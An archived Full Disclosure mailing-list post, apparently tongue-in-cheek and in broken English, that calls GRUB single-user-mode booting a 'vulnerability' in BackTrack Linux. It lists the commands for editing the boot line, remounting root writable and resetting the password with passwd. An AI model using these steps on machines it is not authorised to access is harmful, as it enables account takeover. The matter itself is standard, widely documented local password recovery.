Full Disclosure mailing list archives
Vulnerability in Backtrack
From: Григорий Братислава <musntlive () gmail com>
Date: Tue, 24 Apr 2012 08:41:33 -0400
Is good evening. I is would like to warn you about is vulnerability in Backtrack is all version. Backtrack Linux is penetration tester is system. Is come complete with tool for to make hacking for penetration tester. In is booting Backtrack, vulnerability exist in booting for when start if attacker is edit grub, attacker can bypass restricted user and is boot into admin account. E.g.: grub edit > kernel /boom/vmlinuz-2.3.11.7 root=/dev/sda1 ro Single [ENTER] grub edit > b # mount -t proc proc /proc # mount -o remount,rw / # passwd [ENTER IS ANYTHING YOU WANT] # sync # reboot I is will make this into video for bypassing security in Backtrack for to post on InfoSecInstitute -- `Wherever I is go - there am I routed` _______________________________________________ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
Current thread:
- Vulnerability in Backtrack Григорий Братислава (Apr 24)
- Re: Vulnerability in Backtrack Gage Bystrom (Apr 24)
- Re: Vulnerability in Backtrack Urlan (Apr 24)
- Re: Vulnerability in Backtrack Gage Bystrom (Apr 24)
- Re: Vulnerability in Backtrack David3 Gonnella (Apr 24)
- Re: Vulnerability in Backtrack Disposable (Apr 25)
- Re: Vulnerability in Backtrack James Condron (Apr 25)
- Re: Vulnerability in Backtrack Urlan (Apr 24)
- Re: Vulnerability in Backtrack Gage Bystrom (Apr 24)
- Re: Vulnerability in Gentoo hardened Milan Berger (Apr 24)
- Re: Vulnerability in Gentoo hardened Valdis . Kletnieks (Apr 24)